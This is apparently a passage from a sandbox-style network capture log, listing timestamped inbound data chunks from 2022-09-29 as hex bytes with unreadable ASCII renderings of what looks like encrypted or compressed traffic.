                                                                                                                                                            2022-09-29 12:45:15 UTC23877INData Raw: dc 71 0c 1f 33 aa 1f 6c cb e4 c4 92 10 c4 6c 07 a3 95 1e fc 41 08 5d dc 50 e5 59 8f 41 cf cc 9a f4 7d 4f eb e8 cc 93 9f d7 2c ad e2 b4 0b 48 c9 c0 4e e6 b4 d6 41 a9 9c 30 71 18 c8 db 42 eb 1b 52 17 c5 70 33 6d c8 fb 2d 4c 57 c4 84 12 b5 36 ff 66 5a a3 e0 cb 74 5a 82 3c d6 4a 38 ac a2 e0 50 00 17 e2 13 c5 c0 1f fc ac 99 eb 98 2e 90 97 b3 f2 10 61 2e a8 7f 65 d5 2c 63 b1 9b 90 68 83 f8 8c 35 f0 69 0b a9 8e 5a 72 c9 d9 e9 61 1e 93 c1 c4 14 f3 12 a4 6d db 19 41 c3 f5 31 fd 8a 83 b6 54 fa 7b 51 90 b6 b6 2e de 55 da 2a 23 36 d5 7e 2b c9 57 3f 72 35 41 2f 3a b9 f4 e8 17 6a 52 d8 b2 ef 2c e0 af 7c 06 01 72 ae fb 60 08 dd 8b 7c c9 a8 2e 7a 6d 60 2b dc 28 51 56 a6 94 bb ae b6 a2 10 61 38 47 b7 3b cc 9d 1d 7b bf 46 18 03 f1 bc d4 e9 a0 f8 7f f3 89 fb 14 84 08 e0 f7
                                                                                                                                                            Data Ascii: q3llA]PYA}O,HNA0qBRp3m-LW6fZtZ<J8P.a.e,ch5iZramA1T{Q.U*#6~+W?r5A/:jR,|r`|.zm`+(QVa8G;{F
                                                                                                                                                            2022-09-29 12:45:15 UTC23893INData Raw: b6 0d 49 6e 9c 00 f5 7c 95 4f 8d 64 fd 20 40 41 14 1b f1 fc 05 f7 0c 9b d8 89 4e 36 bd ad 89 9c 5a 0c 39 f4 1c ab b8 8d 57 b5 33 93 88 10 84 be 73 98 ff e5 dd 5d f0 9b 47 05 bb 4f 85 b7 61 26 b3 82 ba 24 a3 79 b3 a8 ea a4 08 1f d1 a2 fc 6a 53 fb 99 70 a9 14 b1 14 e9 f3 0b 0a 28 44 f8 b9 02 46 1a 60 1e 7f 57 fe 7e 62 c1 84 9c 13 69 b6 de 9a 88 11 d9 49 11 9a ce ae 40 c5 60 ab 5e 89 e2 03 31 98 86 dd 1e 33 4d d2 8a d7 69 5c 5d f8 72 a8 fe 97 2e 94 5c 6e 95 7b 5b 58 81 a4 62 db b7 10 f4 15 5e d4 49 2f c2 83 4d 8e 20 13 ce cf 63 cc b2 f1 ef bd 30 a6 be 8a 7f 50 8c 1e 5c e6 68 8a e9 e1 e9 67 ca 2b 17 0b 3b 0d 6e 7e da 61 a4 6a 6d bc 64 4d e5 be fc 68 19 07 4e bf fd 5a 02 02 16 26 f7 c5 12 6d 68 9e 0c b1 68 51 40 dd 3a f9 a3 5b ea ec 76 d0 3c ce 54 1f 8f b5 21
                                                                                                                                                            Data Ascii: In|Od @AN6Z9W3s]GOa&$yjSp(DF`W~biI@`^13Mi\]r.\n{[Xb^I/M c0P\hg+;n~ajmdMhNZ&mhhQ@:[v<T!
                                                                                                                                                            2022-09-29 12:45:15 UTC23909INData Raw: 7b 8f ed 8e 60 0b a8 c0 58 21 80 2b 9f 0d 4d d9 31 89 ab d0 bb 62 3e ff b8 2f 0b a3 13 d0 56 d6 35 2f c2 4c e6 f1 5f 4f 5f c2 2f 7c dc 92 50 7c 8d 94 33 c8 7e 51 c0 36 74 85 6f 4a a3 08 21 de f6 70 12 ce f5 fe c0 f8 f2 42 73 0e f3 66 e7 2e 4f 11 5e ad 80 2f f5 0e b6 85 bb 51 7e 67 17 77 ec 84 23 9e 95 65 ed e7 7e eb c3 42 50 b6 9f d4 e8 16 9f 97 2d eb e4 28 50 f0 c4 22 00 b4 8f 06 40 27 89 4a eb f4 69 dd 09 f9 39 0a c6 63 d6 c9 f0 cf 32 e6 d3 34 f3 22 da 30 1c 69 4f 04 3f c0 47 19 75 67 91 8a 7e bd a7 bd b9 10 ff 62 4b f4 07 7a 6f ac 93 66 dd 08 eb ae 22 48 30 75 e0 a9 f7 3b f3 50 81 86 d9 5c 22 d0 33 71 99 30 81 74 84 66 49 16 9f 9a 3d af f9 67 a7 29 05 0d dc bd 8c 0d d9 3d eb 80 ad 4c 91 39 62 59 1e e0 34 45 13 5b 1b bf 9c 45 cb 65 95 69 97 c1 4a 7c d0
                                                                                                                                                            Data Ascii: {`X!+M1b>/V5/L_O_/|P|3~Q6toJ!pBsf.O^/Q~gw#e~BP-(P"@'Ji9c24"0iO?Gug~bKzof"H0u;P\"3q0tfI=g)=L9bY4E[EeiJ|
                                                                                                                                                            2022-09-29 12:45:15 UTC23925INData Raw: 95 22 78 db 48 6f d7 06 7f db 9c ec 56 bc 8b 1f 24 11 4a c4 d1 68 b1 66 a4 c0 49 32 2d 52 cc ad be 49 cc b6 0c 9e 91 b3 12 d1 80 aa 8c db 07 14 99 dd c2 56 23 e0 2f 3d 37 65 a3 cc 93 c1 98 30 39 81 f1 24 0b b7 67 00 1e 34 63 05 99 fa 65 16 6c 0b cb e0 76 e6 82 7c 3e 4c b4 01 56 56 c1 86 f6 83 ee 98 5b bb d3 31 6b bd 7c 57 c3 d5 f2 a1 6d a2 cb 04 ec be af 9c 25 bf 3f 75 bd e5 55 28 50 ac 8c 2d 94 34 ab 1d a9 c5 12 a5 d6 9c 3b a9 d9 89 64 fc 34 0e 9e 35 cd 9a a4 d0 91 89 ea 96 d9 b0 47 c1 0d 17 f6 a2 0e ce 67 cf 20 ef 33 6c d5 44 36 2e 71 5a f1 75 d9 48 13 8e cb df 42 e9 55 c9 96 6c 08 39 76 7b 50 31 9e d5 6d a6 47 61 a0 a4 22 bd b4 9d f4 17 d7 36 aa 73 b7 1c 87 73 dc 08 19 a8 63 a5 b9 a8 77 da ec 47 ec 9d 25 ec 54 22 48 69 2d bc 57 6d f4 c3 aa 32 bc b8 d7
                                                                                                                                                            Data Ascii: "xHoV$JhfI2-RIV#/=7e09$g4celv|>LVV[1k|Wm%?uU(P-4;d45Gg 3lD6.qZuHBUl9v{P1mGa"6sscwG%T"Hi-Wm2
                                                                                                                                                            2022-09-29 12:45:15 UTC23941INData Raw: c4 dd 7c a8 6e 09 f3 67 85 d9 e6 30 ed 16 99 08 6c 60 66 ab e7 d4 c2 ee 39 93 2d 8e 91 ba 4b c3 ff ed 49 1a 4b 43 0b 11 80 a8 3c 57 e8 62 e3 bb a4 96 95 97 87 aa ba 36 5b 2d a4 b5 78 1c 45 61 db ea a8 d8 4a d8 36 dc d7 87 3d c7 28 36 5a 5d f2 84 1b 02 d3 d7 03 10 d4 2f e3 24 1c 18 66 c4 b8 09 75 67 10 92 03 f7 49 4a f7 c7 4c ff b5 b7 b6 a7 19 fe f3 53 59 ad 2e df 2b 28 21 d3 2f a1 06 e5 97 80 3b 2d 52 a4 91 df 37 5e 12 cf da ce 21 91 9a 35 cc 90 e6 a4 ae 27 9f 3d dc af 0d 14 c4 24 cd 74 f8 1c d7 68 2a 36 d5 31 e1 0c d2 9b 3d a8 69 ec 6e 16 36 3e 01 ed 89 42 f9 6c f1 84 a7 91 ff 9c fd df 6f 93 06 82 a1 90 c1 85 aa bd ee a6 54 f7 58 cc ef b0 ea 79 9d 4d 64 ef 0a 86 2f 83 e5 85 b8 aa 39 60 e8 bd 49 6a b4 6b 40 ac 46 46 81 8d 28 21 25 eb 64 df 34 27 89 b2 84
                                                                                                                                                            Data Ascii: |ng0l`f9-KIKC<Wb6[-xEaJ6=(6Z]/$fugIJLSY.+(!/;-R7^!5'=$th*61=in6>BloTXyMd/9`Ijk@FF(!%d4'
                                                                                                                                                            2022-09-29 12:45:15 UTC23957INData Raw: 94 de 07 1c 05 ed 61 67 bc 0f b9 54 60 28 f9 8f cd 50 d8 3b 6b 9e 15 e3 00 57 f9 7b e7 cf 1d 1b 18 5b 35 15 38 83 b6 80 cb 39 66 f8 7f a8 74 4e a3 02 64 f3 bc 0d ad 31 11 92 15 3e 20 0b 9d f5 f7 8d b1 a7 01 bb d9 f1 db e6 fa 44 ea 2c 4a 79 e1 c1 97 69 fe d0 79 18 a3 7b db b3 97 9d 84 49 64 dd bc 35 78 58 c6 e8 b3 d9 e9 5e d9 e9 0f 7a d1 b4 30 21 fd e4 42 39 3d 7d df 3f a8 d4 eb 5f e0 ee fa 97 e9 b7 e3 bd 64 5b 3f 29 52 53 e0 db f9 f9 68 a5 c7 72 a8 04 d8 7e 6a 43 1d 56 62 5b 91 09 67 56 5c 1e f2 b5 e6 d2 2b 6f 7b 9a ac 38 05 f1 a4 ea 8d 61 8f 10 96 b5 e9 6b d5 77 87 68 43 fa 41 26 75 bb 42 83 67 17 a0 37 4e c0 7c b8 05 1e 4a a8 30 f4 d3 dc 90 8a d5 56 b7 95 ac b9 04 a0 ce 5f bf e9 56 69 16 3b ec d4 fa c3 f0 aa 74 b8 ce fa 87 4c 90 40 bb ec d4 95 2f 07 b7
                                                                                                                                                            Data Ascii: agT`(P;kW{[589ftNd1> D,Jyiy{Id5xX^z0!B9=}?_d[?)RShr~jCVb[gV\+o{8akwhCA&uBg7N|J0V_Vi;tL@/
                                                                                                                                                            2022-09-29 12:45:15 UTC23973INData Raw: dc 34 fb 72 af b1 1d 77 ef 04 c5 0b 38 6a a4 05 7d 1f 6c fd f3 c9 ba 7c 2d 01 74 a6 35 e7 52 62 39 a9 23 dc 2a 20 f4 e3 02 3a 9e 99 b7 c1 82 48 74 0a d0 bc 49 19 94 08 5d e6 67 c2 58 09 80 49 65 e9 bd fc 74 e3 36 fe 61 88 3c 1f 7d 2c 14 86 06 44 7c ee a8 44 52 ae b6 4a 40 c5 f7 11 67 65 ac b1 0e b5 1a 06 29 c6 71 be e8 ed 6b 21 17 b9 18 cd 18 75 1c bf 88 98 a1 47 c3 f3 86 a6 27 9a e4 e0 11 55 b4 67 52 0a 93 1e 66 8b 2a f2 31 0a b9 bd ce 5c dc 2b 93 98 c8 43 74 4f 1a 22 1f 48 b9 40 35 27 01 30 85 b5 87 1d 59 8a 92 18 2e 9a 4f 34 a0 91 f6 4b a8 96 0e 90 b9 75 f8 b8 09 02 c2 cd 64 2c e8 a8 74 50 c7 09 60 8c 63 bf 35 2d 19 eb bc 99 9d 7f 97 cb 69 fd 24 7b f5 70 9a d8 41 22 56 b7 9c 7c 9c fc 0a 79 8d cd 15 73 47 0a 97 65 37 4a 0c b0 77 54 f9 6f eb 75 e2 35 dc
                                                                                                                                                            Data Ascii: 4rw8j}l|-t5Rb9#* :HtI]gXIet6a<},D|DRJ@ge)qk!uG'UgRf*1\+CtO"H@5'0Y.O4Kud,tP`c5-i${pA"V|ysGe7JwTou5
                                                                                                                                                            2022-09-29 12:45:15 UTC23989INData Raw: f3 34 a4 3f 32 2a 20 12 eb a4 31 8e 43 1b 2b a8 32 ca 7e 96 cb 85 f1 86 c2 c7 7e 6a 08 5a fa a7 a0 ae 6e 47 03 25 67 e8 24 29 cc c6 0b 7c 06 68 6f b1 44 70 c5 ba 9b 47 2a 10 aa 78 bf 08 0e 6a 28 b1 b0 90 3b 3d 93 7d b4 ab e7 56 9a 2b f1 67 5f ae 8b 22 0c 1b 8c a4 e2 13 26 d3 35 07 f7 4a 6f 8f 3b 55 92 e8 26 41 e3 91 1e 6a fe 31 23 09 b6 96 df 0a 37 f2 ff 02 1b 61 9d d9 2a 88 9a 35 ff 8b e8 e8 b9 77 9b d1 72 d9 e4 85 18 b0 f4 d9 da ca 10 92 8c 87 c9 f1 c3 3a 9f 58 ea 29 00 66 2b 70 9a 91 d6 3f 4a 9b 9a 40 bd cd 1b 71 5d 24 1f f1 1d 9f aa 49 6b ba 53 9a 54 70 0c 0c 56 dc 06 df a8 31 1b 83 de 4f 7d dc 88 46 ab f1 74 85 72 ff 14 59 14 57 03 77 c1 fe b8 82 1b b7 00 4f da 6b 92 e5 bc 3c a3 ac 3f 33 45 f4 b3 dc f6 2c fe d5 15 8f c6 f7 27 19 ae 9c 8d 5c b7 e8 c8
                                                                                                                                                            Data Ascii: 4?2* 1C+2~~jZnG%g$)|hoDpG*xj(;=}V+g_"&5Jo;U&Aj1#7a*5wr:X)f+p?J@q]$IkSTpV1O}FtrYWwOk<?3E,'\
                                                                                                                                                            2022-09-29 12:45:15 UTC24005INData Raw: 25 d7 41 31 af 75 1f 95 58 56 36 8b 44 5d 0f 50 92 76 70 44 45 6a 89 17 4a 98 0a f3 d0 8f b4 61 d8 76 f5 91 17 60 3c 42 2c b0 06 23 b7 d2 c2 19 22 7a 14 4e 52 56 66 47 a4 4d 5c b8 22 68 01 6f 80 bd 03 fa a5 12 ea 09 a0 17 83 8a 1f d7 db d1 2d 2b 03 94 6a 90 1c c8 8c 1a 26 c5 02 ff c6 ea 88 70 91 17 d1 ad bb a9 38 7c a0 d4 0b 7f 77 ab 59 dd dd 79 2c fd 0c 01 41 60 f8 f7 29 b3 11 e4 15 44 e1 b4 0a e5 21 87 d7 e1 25 66 57 aa 86 b4 d2 ec 86 96 e6 9d f2 56 46 2b 4e 5f b8 a6 88 34 b1 9c ae 89 df 6a d3 1d 55 c4 a3 1b 56 f2 d3 e7 e7 7e 47 69 67 ab b3 75 11 c2 f7 6a 28 b3 d4 04 f6 ce e6 f5 45 1c a6 e5 3a e6 87 bd a6 f9 2a 68 80 eb bc 43 82 89 f4 7e 64 88 9e 18 97 a5 52 55 d8 77 b3 17 0c 51 53 75 74 40 03 fc 4d cb 58 3b 1a 11 a6 d0 97 e2 63 6e 9a a0 02 f5 ab c5 9d
                                                                                                                                                            Data Ascii: %A1uXV6D]PvpDEjJav`<B,#"zNRVfGM\"ho-+j&p8|wYy,A`)D!%fWVF+N_4jUV~Giguj(E:*hC~dRUwQSut@MX;cn
                                                                                                                                                            2022-09-29 12:45:15 UTC24021INData Raw: 0a 1c 1b 31 0f 0d 33 5a f3 4e 4e 75 e9 8d 5b b6 58 92 ec 08 04 5f 54 28 bb 06 df 4a 60 1d ae 12 67 9a ef 92 93 2e c7 3e aa 87 04 5e b7 50 6b 32 2a 8d 23 d1 f0 f6 e6 c7 9f 86 6a 9c d4 d6 65 47 87 c8 97 44 75 81 09 2d a4 48 e2 8f 23 b4 73 f7 60 30 93 93 dc 29 27 87 51 45 0f b5 ff 4f f2 a3 f1 d8 32 4f 8c 9a 2d 10 f9 b5 bb a7 08 62 0f 61 82 dc ef bf fe b4 66 9a 63 6e 9d 8f df 3a f6 12 c4 e2 bc fb 9b b9 52 05 56 0f 8a 73 f3 fb 50 93 68 11 bd 94 94 b1 a0 cf 4d 9e d2 98 79 e0 5d 9a 35 67 07 24 12 3d d0 1e 90 d0 65 6a ba 2c 0d 88 03 dd 37 6a d4 d0 88 43 7b 1c 2d f1 c8 f5 6a 42 8a d9 b2 e0 3c 94 a7 a4 17 c0 14 37 0b 83 b6 06 9c 61 b1 0a 68 5c 0d 7a 03 81 29 c8 25 ac 60 75 40 7b 26 1d 32 a2 17 44 5e f1 20 43 68 82 c6 ea 08 10 58 43 5d bb cb ec a0 63 0f 99 46 41 b4
                                                                                                                                                            Data Ascii: 13ZNNu[X_T(J`g.>^Pk2*#jeGDu-H#s`0)'QEO2O-bafcn:RVsPhMy]5g$=ej,7jC{-jB<7ah\z)%`u@{&2D^ ChXC]cFA
                                                                                                                                                            2022-09-29 12:45:15 UTC24037INData Raw: e7 bf 72 22 6b b4 c4 16 74 d3 5d b5 d5 9e 7a fe ea 58 58 1e 91 22 7a fa fe bd a0 64 51 5c b9 b2 9f 08 a5 6d 8d aa 34 7b a3 a3 0c 4c 6e e0 31 6a 65 2a 8f 1f 21 7d c0 9a 9b 5c 5c a9 22 fd 59 bb 64 03 36 5f dd 6a 5c c2 9f e2 16 e7 b7 d9 ac 9f 9d 97 fc 5a 36 63 52 36 0f 31 c6 5c d6 1b 2e 91 43 0a 28 08 9e 72 48 f6 4b d6 07 38 91 01 22 fa 69 83 12 d7 89 88 64 7d 5e 97 9e 0e aa b8 be 79 ef 63 1d 71 19 ac 28 fe de d3 cc 84 b4 3f d3 11 5f cf b9 b8 7a a8 72 6b a9 e5 75 fa 0b b7 4b 2a f9 b7 e4 8a 0e 5f 8f a0 e5 be 93 10 d4 aa 00 dd 78 e2 97 df 0c 9b 49 7e 15 f7 8c 72 c0 ed 92 e4 6f 62 c6 0b 72 5f 31 48 a0 0e 85 7f 59 78 df ba 5f e1 fa f7 f1 fc 3f a7 40 2f 1d 9b 76 2b 74 c0 81 54 55 d0 2c 8d a5 f2 c8 38 0e 95 b0 8b be 98 ae 58 1a 7d ae 96 14 05 ac 01 5c 18 7e 83 3d
                                                                                                                                                            Data Ascii: r"kt]zXX"zdQ\m4{Ln1je*!}\\"Yd6_j\Z6cR61\.C(rHK8"id}^ycq(?_zrkuK*_xI~robr_1HYx_?@/v+tTU,8X}\~=
                                                                                                                                                            2022-09-29 12:45:15 UTC24053INData Raw: 88 e6 79 51 35 18 1d 23 55 ec c0 e5 9d 72 9b 28 b9 2f 50 52 e3 53 ce f7 d6 a6 be 66 b7 ae df a1 34 1e 30 c9 c8 b5 d9 9d d4 d6 9a 8d 11 15 70 d2 36 4b 24 fa 7b 96 15 8a 85 3d f4 ba 23 d1 e4 43 b6 7d 28 c9 b0 59 15 d3 bb 35 d3 0c 84 c3 57 b3 3c 67 b4 7b 41 32 0d 1c b8 76 f0 70 b3 e6 19 15 bf ee cc 0f bb f2 77 24 5f 61 29 cc a2 d2 55 6c e0 92 c2 ce 53 ab 19 da de 80 b2 75 53 a1 a1 13 7f 64 a5 b7 b6 37 0d 73 da 15 06 f0 30 de 93 2d 01 20 b8 bd 2e 7d 04 82 d0 48 e9 82 a7 fe 94 bc 05 e2 55 43 1f 4a c9 ac ff c1 76 9c 3a 0f 34 ac 34 13 c4 74 e9 43 bb 77 2f c6 99 57 f9 3f 0a 8c 40 96 54 0c 02 8d 93 0d aa 45 0a 71 78 88 25 b8 f2 65 18 36 cb 90 dc 2a 1f 56 a7 57 09 a5 7d eb 68 49 0e 9c c1 d1 ee 73 cf 9f 83 6d 78 4b 48 1d c6 3e c2 3a a3 df 6a 8a ed 1a 9d 1b 95 bf 4d
                                                                                                                                                            Data Ascii: yQ5#Ur(/PRSf40p6K${=#C}(Y5W<g{A2vpw$_a)UlSuSd7s0- .}HUCJv:44tCw/W?@TEqx%e6*VW}hIsmxKH>:jM
                                                                                                                                                            2022-09-29 12:45:15 UTC24069INData Raw: 50 b7 e9 68 f1 fc d4 42 7d 36 2b 60 8d 1f fe ab 27 75 48 a6 9a c6 ee 8e 9f 71 38 35 a8 91 01 d1 bb 38 63 4b 14 1a 42 ef 69 8d b6 08 30 23 b1 5a 26 8e 3f b5 6f 29 65 ab 04 b6 fc 97 6d 78 70 5f 1e 3d 0c 24 0e 6f 5f 88 3d 12 b0 3a 2f de 42 1f 0b b3 af fc dd 97 46 d5 a2 19 3f 02 1b b1 04 d1 5c 35 de 92 cc 86 a5 91 65 76 f2 80 bf 72 82 ab c1 46 13 26 24 d8 c8 1d 2f 46 00 8d 9b cd 8d d8 5d ea 86 e2 12 ce d0 c7 12 47 bd 0c 7e a1 46 19 55 88 7c d0 02 f0 61 9e 15 4a e0 4f dd 0c c1 1f d4 25 21 d3 56 41 41 8c e1 13 56 cd f3 42 99 3e 26 ef 77 6d af 2a 24 ec 5a b2 f3 ec 5d 78 3f c2 5c 66 99 9a 57 f2 05 69 d5 67 61 6e cb 26 2a 07 0c 84 86 bf d7 05 d8 c3 47 c5 68 7a b0 a7 17 a7 08 a0 9a 08 92 bf 43 d0 19 fa 15 f7 62 db 7e 5a 7c 01 31 da 7e 4c 06 cb ba 26 00 0d 2d ee e6
                                                                                                                                                            Data Ascii: PhB}6+`'uHq858cKBi0#Z&?o)emxp_=$o_=:/BF?\5evrF&$/F]G~FU|aJO%!VAAVB>&wm*$Z]x?\fWigan&*GhzCb~Z|1~L&-
                                                                                                                                                            2022-09-29 12:45:15 UTC24085INData Raw: 52 87 56 b7 32 2e ec 41 a4 bb 62 ab ef 7f 86 d8 c3 a3 e9 12 ee ee d5 58 b9 3f 07 71 21 61 0a eb 25 be 77 d1 b8 c2 dd 91 88 39 cd 7a 43 d8 05 6a bd f3 50 d1 f4 fd ef 6c 1b a8 3e f7 f9 a2 1e 45 68 a7 de 98 73 c9 78 6c c0 38 e3 a6 5d d2 b3 16 c7 fc 6c 79 f9 81 1b 06 cd 84 01 48 f0 1c 29 18 00 97 1e ce e0 2d 88 2e d0 9d 10 f2 2b 6d 99 fc 04 ec a0 46 c2 97 e7 37 7d c9 9d 6c d9 80 ae 93 b0 cd e8 b2 ae f5 68 4e 10 84 98 06 7f 71 7f 9c 6d ae e8 1f 95 e7 53 9b 54 49 3c f4 31 3e 58 c4 27 cd 4c fd af 3b 2c c7 2b a0 76 b0 3f 67 82 21 3c 4a de 8e 4a ba 30 84 50 55 9c 1a 83 17 45 c6 ec fc 55 15 cb 4a 07 31 98 55 ff 9f 46 91 88 37 ce d8 fd 02 3b 5c 4a 76 fa 37 26 7f 9d 23 e3 18 35 58 37 1c 43 f5 76 52 f5 47 d9 16 a3 f0 dc 50 05 a1 7c bb 9c c4 f9 ae aa c5 6c 34 36 84 e7
                                                                                                                                                            Data Ascii: RV2.AbX?q!a%w9zCjPl>Ehsxl8]lyH)-.+mF7}lhNqmSTI<1>X'L;,+v?g!<JJ0PUEUJ1UF7;\Jv7&#5X7CvRGP|l46
                                                                                                                                                            2022-09-29 12:45:15 UTC24101INData Raw: 2e d1 38 7e e3 18 9b fa f8 4b 95 86 c6 aa d3 4f 8e c8 61 a4 b1 88 db 36 79 ab 25 7f 80 89 f6 9c bf 6d 35 c4 52 8b 6a b1 1b 7f 4f 76 2d d7 6f 6b b5 9a 42 ad 38 12 10 66 20 22 e3 2b c2 cd c9 17 ac 6b b5 c5 b9 39 9d f5 ff da 07 3f af e9 5e 6d 01 af fd f5 7a 2b fa 8b 98 41 0d ba 3c 91 74 e0 ae b6 d8 61 6e 40 7d ec 09 1c 2d 77 b7 07 7a 0d 31 c4 eb 08 a1 1f 2c f1 da 06 6b e0 9b d1 d2 18 03 1c 62 12 50 b2 a4 8f 29 a7 bb 04 3d 57 17 e2 e9 7e b1 fb 21 de 20 1d b4 70 4b 98 4f 68 1e af 9e 99 58 50 b3 d4 d5 cd b7 73 d9 1b 1c bf 8b 1b 05 3c e8 22 d1 f4 1f bd 0f 63 96 db b1 3d d1 5b 46 4e cb 0b 03 13 53 03 bd 8e 65 30 bb 16 74 60 fb 16 5f 5f e9 1c f8 e1 35 fa 53 ba ff 13 eb 7f 3f 2e 5e af d7 52 71 35 86 31 01 38 76 b2 ad 96 0d 48 d1 dc 7a b6 02 d5 36 d4 41 b5 63 4f 57
                                                                                                                                                            Data Ascii: .8~KOa6y%m5RjOv-okB8f "+k9?^mz+A<tan@}-wz1,kbP)=W~! pKOhXPs<"c=[FNSe0t`__5S?.^Rq518vHz6AcOW
                                                                                                                                                            2022-09-29 12:45:15 UTC24117INData Raw: 93 50 69 41 6a bc 21 42 8f 54 57 58 8e 98 72 5a 36 c0 39 a2 d1 4b 1f ac cc 56 de 8b 4d b9 90 eb 3c 0d dc bd 5d bd 1f 3d e6 1e af af 29 56 9d 62 e3 f9 ac 1f 6e d1 0c 72 48 a4 f1 f6 25 14 29 b6 16 09 6a c6 f7 00 d7 d9 03 e9 f1 ce 0c 6f 6d 7d e8 e6 13 a3 4a 27 dd c3 20 66 37 9c 6e 46 f2 57 fe 34 47 04 0b 34 db 18 03 e5 ec e5 57 01 e7 51 44 26 36 88 63 2e 2e bf 7c 16 ce fb 3d 1c 65 8e 4a 9b c4 26 3f 70 c4 3d b7 a9 e0 e8 f9 f0 35 e1 49 1a 44 9d 4e ee c0 13 7a 45 b7 8a 83 11 a9 7a 56 5e 39 1e 96 e3 cf 37 b0 ab 87 8c 30 f0 1e 40 8d 7a 60 b5 b3 d3 32 20 eb 19 4c 84 c7 6d 75 aa 66 aa 7f 26 80 1e 25 34 17 4b 3d 38 ee c6 0d 78 0d 47 d3 32 b8 60 01 3b 74 e7 e5 bb cd f0 64 e2 b5 3f e0 a8 fc 7a d0 08 74 1a 83 c5 4a 48 21 11 da 91 ae 4a 9c 53 f1 2a b0 d2 f3 c2 66 ee f5
                                                                                                                                                            Data Ascii: PiAj!BTWXrZ69KVM<]=)VbnrH%)jom}J' f7nFW4G4WQD&6c..|=eJ&?p=5IDNzEzV^970@z`2 Lmuf&%4K=8xG2`;td?ztJH!JS*f
                                                                                                                                                            2022-09-29 12:45:15 UTC24133INData Raw: 53 0b 75 05 84 ea 76 80 7e 8d a6 30 8b cf 5b 9d 60 54 84 93 fd 2d f2 8f 4b 6c 8f c8 74 1a e3 49 91 02 62 b5 27 f0 91 03 a4 65 30 7d 95 7a c8 e4 98 fd ce 60 fd 46 7f ae 16 72 2a 7f a4 84 f5 bb 45 dd 8a 04 7b ed 80 ab 6f 3a 8f fb 58 bf 99 20 5f 11 58 48 70 44 3f 5a cc 16 b7 71 4f 44 b1 bd 03 39 df d7 7d 03 75 5a fb 60 e9 8d 31 f0 82 0c a4 58 66 14 cd 0f 93 ca c9 15 8b 61 ab 51 bd 1a ea e5 40 3d 79 43 a1 5b c2 38 de 01 c6 90 0d 67 bd bb 44 01 43 92 11 46 8c 7d 3a 9d 43 52 c6 bd ab 16 3e 58 ec 6c 1a fa fa ea 23 a9 cf 5d c5 cc a1 8e e6 72 1d 30 e7 10 45 ed b2 fb 65 e6 0a 44 ae b5 24 4c ec 4c f2 ae 3a 80 e7 f6 69 aa f2 ec a0 ac 99 f8 d4 64 22 32 14 3b 7a 3b 79 61 d3 59 11 35 0c f8 ed 68 7c c7 13 e0 86 ae 20 ce bb b0 a5 25 83 48 6d 68 41 50 cc 05 ce e6 4e 04 78
                                                                                                                                                            Data Ascii: Suv~0[`T-KltIb'e0}z`Fr*E{o:X _XHpD?ZqOD9}uZ`1XfaQ@=yC[8gDCF}:CR>Xl#]r0EeD$LL:id"2;z;yaY5h| %HmhAPNx
                                                                                                                                                            2022-09-29 12:45:15 UTC24149INData Raw: 9b e8 e6 e1 34 20 7d 92 29 3a d7 93 fc 37 a6 84 1b f4 57 07 c8 1e c0 09 a4 2c 1c 49 63 e4 05 d7 f5 22 42 b2 b9 04 05 2a 5f 70 c2 f9 e6 7d ee 67 34 a4 d6 80 d5 9e c9 7a 6c 11 28 5e 48 2d 81 51 16 f7 1b 1a d1 32 8c ec fd 37 d6 cf 8e d3 0e 20 0d c3 4f e8 d6 91 28 77 58 cb 98 72 38 b2 99 ca 7c dc 5e d2 3b 95 3f 3f af 84 aa 61 f3 b2 99 22 9c 64 2e 0f b7 7e 6f 58 84 ee 72 61 d3 03 67 f2 c2 b2 47 dd 54 fd 5b 7c 4e db 39 f8 75 2f d3 e7 17 5c 04 40 ef d5 a1 e0 72 68 94 a7 c8 9c e3 e1 1c 18 5e 9c 31 da bf 71 61 64 ef 06 fa cf ed 73 af 67 81 38 6a 65 e5 02 44 82 7a 6f 6a 3d 7a 00 f5 87 23 6d bc b2 0f 02 f9 fd a2 b9 23 0f e8 a9 a2 67 da 09 1c 31 6e e9 bc a3 e9 0f 7f 40 ab e8 b0 25 52 e7 a3 c2 fa 6f 96 8f 70 80 82 08 18 ae bb 01 a9 b0 15 89 e2 83 69 20 21 00 fa ae ec
                                                                                                                                                            Data Ascii: 4 }):7W,Ic"B*_p}g4zl(^H-Q27 O(wXr8|^;??a"d.~oXragGT[|N9u/\@rh^1qadsg8jeDzoj=z#m#g1n@%Ropi !
                                                                                                                                                            2022-09-29 12:45:15 UTC24165INData Raw: 89 99 86 28 1f 5b ce e5 ea f2 4c 8c 85 be 44 c3 9b 0a 0c e0 58 2f 84 88 0d ea 5f b7 0e 5b 8f 14 96 53 74 5a ad ba 21 55 8b 95 8f a6 2a 34 e8 b3 c2 9b 43 9a c1 9f 41 07 12 fa 62 07 ae 49 c1 3a 0a 30 78 44 55 40 be 1b cf 52 0c 66 21 19 eb df 5e 3e 25 7b 51 51 91 e2 b2 a5 72 8e 64 a7 ab 06 d9 e5 05 8c 49 90 77 cf 08 89 7b c8 d1 17 68 cb ec 91 6c 7f 02 1e 2a 8d d4 dd f3 10 1f 62 c7 f5 f0 3f bb 80 12 5b f6 a3 a5 af e4 ea 6a 79 80 ac 8a fe 00 83 a6 93 72 57 3a 09 c4 b2 31 f0 20 8d bd bb dd 87 f8 15 76 40 a0 a4 62 3d ac 71 6e d0 3e f4 75 4e 0a 4b fe cb 3d 67 b4 7d 3b 0a 57 c6 29 64 88 21 79 b3 74 38 f6 13 3d 9f 0b e3 5e 47 96 6b 5c bf be e4 cc 53 8f f2 fa 6a 1a a7 01 4c 1e dd 6c 03 73 2a 0d d3 6e 8c 59 a1 c7 87 62 13 52 6e 02 c5 a3 25 e5 91 d8 70 0e d6 d7 97 f6
                                                                                                                                                            Data Ascii: ([LDX/_[StZ!U*4CAbI:0xDU@Rf!^>%{QQrdIw{hl*b?[jyrW:1 v@b=qn>uNK=g};W)d!yt8=^Gk\SjLls*nYbRn%p
